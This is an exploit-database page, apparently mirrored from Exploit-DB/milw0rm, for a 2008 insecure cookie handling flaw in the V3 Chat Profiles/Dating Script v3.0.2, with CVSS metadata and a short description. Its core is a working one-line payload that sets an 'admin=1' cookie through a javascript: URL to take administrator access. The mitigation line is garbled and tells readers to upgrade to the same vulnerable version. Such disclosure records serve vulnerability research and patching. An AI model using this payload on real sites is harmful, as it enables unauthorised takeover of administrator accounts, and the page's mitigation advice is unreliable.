header-logo
Suggest Exploit
vendor:
V3 Chat - Profiles/Dating Script
by:
Mountassif Moad
7.5
CVSS
HIGH
Insecure Cookie Handling
614
CWE
Product Name: V3 Chat - Profiles/Dating Script
Affected Version From: V3 Chat - Profiles/Dating Script v3.0.2
Affected Version To: V3 Chat - Profiles/Dating Script v3.0.2
Patch Exists: YES
Related CWE: N/A
CPE: a:v3chat:v3_chat_-_profiles/dating_script:3.0.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

V3 Chat – Profiles/Dating Script v3.0.2 Insecure Cookie Handling Vulnerability

V3 Chat - Profiles/Dating Script v3.0.2 is prone to an insecure cookie handling vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to gain administrative access to the application.

Mitigation:

Upgrade to the latest version of V3 Chat - Profiles/Dating Script v3.0.2
Source

Exploit-DB raw data:

###############################################################################################
[+] V3 Chat - Profiles/Dating Script v3.0.2 Insecure Cookie Handling Vulnerability
[+] Discovered By : Mountassif Moad         
[+] Greetz : All my freind         
################################################################################################
Exploit:
javascript:document.cookie = "admin=1; path=/";

# milw0rm.com [2008-11-08]

Navigation

Suggest Exploit

Services By CQR